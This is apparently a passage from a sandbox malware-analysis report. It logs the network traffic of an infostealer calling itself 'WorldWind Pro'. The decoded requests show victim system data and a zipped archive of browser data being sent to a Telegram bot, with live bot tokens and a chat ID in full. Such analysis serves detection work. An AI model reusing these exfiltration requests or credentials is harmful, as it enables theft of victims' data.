                                                                  Jun 28, 2024 11:21:02.320681095 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:02.322499990 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:21:02.327354908 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:02.327759027 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:21:02.332566023 CEST77074973994.232.249.111192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jun 28, 2024 11:19:29.250844002 CEST5349368162.159.36.2192.168.2.4
                                                                  Jun 28, 2024 11:19:29.734436035 CEST6092553192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:29.742516994 CEST53609251.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:38.681802034 CEST4960953192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:38.691098928 CEST53496091.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:38.742041111 CEST6011053192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:38.749572039 CEST53601101.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:39.267792940 CEST6518353192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:39.278939009 CEST53651831.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:40.043652058 CEST4984853192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:40.051337957 CEST53498481.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:52.033472061 CEST5127053192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:52.041289091 CEST53512701.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:56.950659990 CEST5992253192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:56.958442926 CEST53599221.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jun 28, 2024 11:19:29.734436035 CEST192.168.2.41.1.1.10x9d11Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:38.681802034 CEST192.168.2.41.1.1.10xe45Standard query (0)107.143.13.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:38.742041111 CEST192.168.2.41.1.1.10x9364Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:39.267792940 CEST192.168.2.41.1.1.10xc96fStandard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:40.043652058 CEST192.168.2.41.1.1.10xa10cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:52.033472061 CEST192.168.2.41.1.1.10xa081Standard query (0)107.143.13.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:56.950659990 CEST192.168.2.41.1.1.10x676bStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jun 28, 2024 11:19:29.742516994 CEST1.1.1.1192.168.2.40x9d11Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:38.691098928 CEST1.1.1.1192.168.2.40xe45Name error (3)107.143.13.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:38.749572039 CEST1.1.1.1192.168.2.40x9364No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:38.749572039 CEST1.1.1.1192.168.2.40x9364No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:39.278939009 CEST1.1.1.1192.168.2.40xc96fNo error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:39.278939009 CEST1.1.1.1192.168.2.40xc96fNo error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:40.051337957 CEST1.1.1.1192.168.2.40xa10cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:52.041289091 CEST1.1.1.1192.168.2.40xa081Name error (3)107.143.13.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:56.958442926 CEST1.1.1.1192.168.2.40x676bNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:56.958442926 CEST1.1.1.1192.168.2.40x676bNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                  Jun 28, 2024 11:19:56.958442926 CEST1.1.1.1192.168.2.40x676bNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • api.mylnikov.org
                                                                  • api.telegram.org
                                                                  • pastebin.com
                                                                  • icanhazip.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.464788104.16.184.241804884C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jun 28, 2024 11:19:38.758981943 CEST63OUTGET / HTTP/1.1
                                                                  Host: icanhazip.com
                                                                  Connection: Keep-Alive
                                                                  Jun 28, 2024 11:19:39.202603102 CEST534INHTTP/1.1 200 OK
                                                                  Date: Fri, 28 Jun 2024 09:19:39 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: keep-alive
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET
                                                                  Set-Cookie: __cf_bm=q4oOtR63przvD.lOtDlk74ZIoFQ3V4br1u5OsBlV8T0-1719566379-1.0.1.1-hN7kPbPMeiEpcNc7sdarBef9HB.N8XSgmT1OHkR8itxPaknwelcEP_mA7El7CJeIlZ_jQ4Pk8IYH1l23LLa4DA; path=/; expires=Fri, 28-Jun-24 09:49:39 GMT; domain=.icanhazip.com; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 89ac98adbc316a57-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                  Data Ascii: 8.46.123.33


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.464795104.16.184.241805052C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jun 28, 2024 11:19:52.143790007 CEST63OUTGET / HTTP/1.1
                                                                  Host: icanhazip.com
                                                                  Connection: Keep-Alive
                                                                  Jun 28, 2024 11:19:52.609555006 CEST534INHTTP/1.1 200 OK
                                                                  Date: Fri, 28 Jun 2024 09:19:52 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: keep-alive
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET
                                                                  Set-Cookie: __cf_bm=nZTlFmZR9jTHqFBOV8Bqgfg6UBRRAvYuZxiuyjenBOs-1719566392-1.0.1.1-iFRPiyl39DR.mxkxHWHbXbLeGcyH4A3XrKXGlmLXqYQhdzA9QHssJb7vd3p10yl6K6VxAWdUPjIiWuCbJ3wt1Q; path=/; expires=Fri, 28-Jun-24 09:49:52 GMT; domain=.icanhazip.com; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 89ac99017ef74334-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                  Data Ascii: 8.46.123.33


                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.464790104.21.44.664434884C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:39 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                                  Host: api.mylnikov.org
                                                                  Connection: Keep-Alive
                                                                  2024-06-28 09:19:40 UTC797INHTTP/1.1 200 OK
                                                                  Date: Fri, 28 Jun 2024 09:19:39 GMT
                                                                  Content-Type: application/json; charset=utf8
                                                                  Content-Length: 88
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: max-age=2678400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 8474
                                                                  Last-Modified: Fri, 28 Jun 2024 06:58:25 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a3qNjNgONpb%2F%2FQwiS3LqKqJZz3uq6%2FWtOjVouUpm0DMEt77BeL6cdmBgHqOlqL3F%2BLHG%2BJZMD7p3%2BOB7wn0R8IzXTABghmxbpFIx6RBTO2g9K1WG4Ipq3cVE%2FXKmkDHsGwI2"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=0; preload
                                                                  X-Content-Type-Options: nosniff
                                                                  Server: cloudflare
                                                                  CF-RAY: 89ac98b2e8f3726e-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-06-28 09:19:40 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 39 35 35 37 39 30 35 7d
                                                                  Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1719557905}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.464791149.154.167.2204434884C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:40 UTC1722OUTGET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%2 [TRUNCATED]
                                                                  Host: api.telegram.org
                                                                  Connection: Keep-Alive
                                                                  2024-06-28 09:19:40 UTC346INHTTP/1.1 400 Bad Request
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 28 Jun 2024 09:19:40 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 56
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2024-06-28 09:19:40 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.464792149.154.167.2204434884C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:41 UTC171OUTGET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                                  Host: api.telegram.org
                                                                  2024-06-28 09:19:41 UTC346INHTTP/1.1 400 Bad Request
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 28 Jun 2024 09:19:41 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 56
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2024-06-28 09:19:41 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.464796104.21.44.664435052C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:53 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                                  Host: api.mylnikov.org
                                                                  Connection: Keep-Alive
                                                                  2024-06-28 09:19:53 UTC799INHTTP/1.1 200 OK
                                                                  Date: Fri, 28 Jun 2024 09:19:53 GMT
                                                                  Content-Type: application/json; charset=utf8
                                                                  Content-Length: 88
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: max-age=2678400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 8488
                                                                  Last-Modified: Fri, 28 Jun 2024 06:58:25 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kW404a5yLmreaQBcOZUKAgPfEmIpBxLrY2CfP%2BW8bAZxzpE2RHJ%2FqOReD4tIwYbCWNTdRzkp%2F%2BnOnYptc%2FLHb7QmiOL%2B0s7cH9UXHCGLGSealUB%2BLRTzVThgf1d%2BW1i9WOR"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=0; preload
                                                                  X-Content-Type-Options: nosniff
                                                                  Server: cloudflare
                                                                  CF-RAY: 89ac9905baa142b8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-06-28 09:19:53 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 39 35 35 37 39 30 35 7d
                                                                  Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1719557905}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.464797149.154.167.2204435052C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:53 UTC1722OUTGET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%2 [TRUNCATED]
                                                                  Host: api.telegram.org
                                                                  Connection: Keep-Alive
                                                                  2024-06-28 09:19:54 UTC389INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 28 Jun 2024 09:19:54 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1870
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2024-06-28 09:19:54 UTC1870INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 36 36 32 38 30 35 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 69 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 69 61 6d 6f 74 72 69 78 65 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 39 35 36 36 33 39 34 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 63 5c
                                                                  Data Ascii: {"ok":true,"result":{"message_id":972,"from":{"id":6766280506,"is_bot":true,"first_name":"Diamotriiix","username":"diamotrixedbot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1719566394,"text":"\ud83c\


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.464798149.154.167.2204435052C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:54 UTC171OUTGET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                                  Host: api.telegram.org
                                                                  2024-06-28 09:19:55 UTC388INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 28 Jun 2024 09:19:54 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 288
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2024-06-28 09:19:55 UTC288INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 36 36 32 38 30 35 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 69 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 69 61 6d 6f 74 72 69 78 65 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 39 35 36 36 33 39 34 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c
                                                                  Data Ascii: {"ok":true,"result":{"message_id":973,"from":{"id":6766280506,"is_bot":true,"first_name":"Diamotriiix","username":"diamotrixedbot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1719566394,"text":"\ud83d\


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.464799149.154.167.2204435052C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:55 UTC254OUTPOST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary="41deac85-9fb9-4f5f-9506-a40f6f02b564"
                                                                  Host: api.telegram.org
                                                                  Content-Length: 152152
                                                                  Expect: 100-continue
                                                                  2024-06-28 09:19:56 UTC40OUTData Raw: 2d 2d 34 31 64 65 61 63 38 35 2d 39 66 62 39 2d 34 66 35 66 2d 39 35 30 36 2d 61 34 30 66 36 66 30 32 62 35 36 34 0d 0a
                                                                  Data Ascii: --41deac85-9fb9-4f5f-9506-a40f6f02b564
                                                                  2024-06-28 09:19:56 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 5c 6a 6f 6e 65 73 40 38 38 38 36 38 33 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 25 35 43 6a 6f 6e 65 73 25 34 30 38 38 38 36 38 33 5f 65 6e 2d
                                                                  Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5Ca6951299a1e0d1ba1371dbc36b7a92d9%5Cuser%40888683_en-
                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 2e 46 dc 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 76 2a dc 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 76 2a dc 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                                  Data Ascii: PK.FXBrowsers\Edge\PKv*XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKv*XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 52 40 44 57 43 fa 88 fe 82 02 00 00 02 04 00 00 3d 00
                                                                  Data Ascii: =Vbj4|`@+t,H~!W*XRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC|Wm<*{^-};XQTKoJJ{_;PKR@DWC=
                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: d8 41 b2 dd a7 ae 93 24 18 c6 b1 68 57 88 6d 8f fd 1b 0b a9 f2 4a d1 dc 74 e9 ba ac bf 2b c0 a3 60 ce 99 64 a9 be af 19 a8 54 2f 2b d7 d9 c2 2d f7 f2 07 dc 76 81 93 c3 31 50 ae 79 87 53 ff 0a 1d 9d d1 7b d8 56 d8 7f 1d f9 0a 44 56 ef 8e be 59 f1 0f 96 40 cd 03 fb 64 8e e0 23 ba f0 e9 ee 18 0a 65 91 61 cf 79 7e 4b fc 38 2a 2c 1f 49 5b e4 62 07 3f 91 8a 1d 31 73 a8 c5 34 0d 19 2e 44 28 35 7c 68 ee b6 35 54 ed 6b 38 7e df 0b 6d 84 fe 8a cb 81 3e 46 62 9b 29 e7 88 b9 5f 4c 9c c9 0c 32 92 58 01 12 3c c3 12 db 19 f3 73 30 4b 1d 1e 14 b2 c0 e8 2e 7a 49 7a d3 7b 18 78 bb f4 29 6b 5e 76 ba cd 35 8b bf bf 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a
                                                                  Data Ascii: A$hWmJt+`dT/+-v1PyS{VDVY@d#eay~K8*,I[b?1s4.D(5|h5Tk8~m>Fb)_L2X<s0K.zIz{x)k^v5PKQ@DWYE4Grabber\DRIVE-C\Users\j
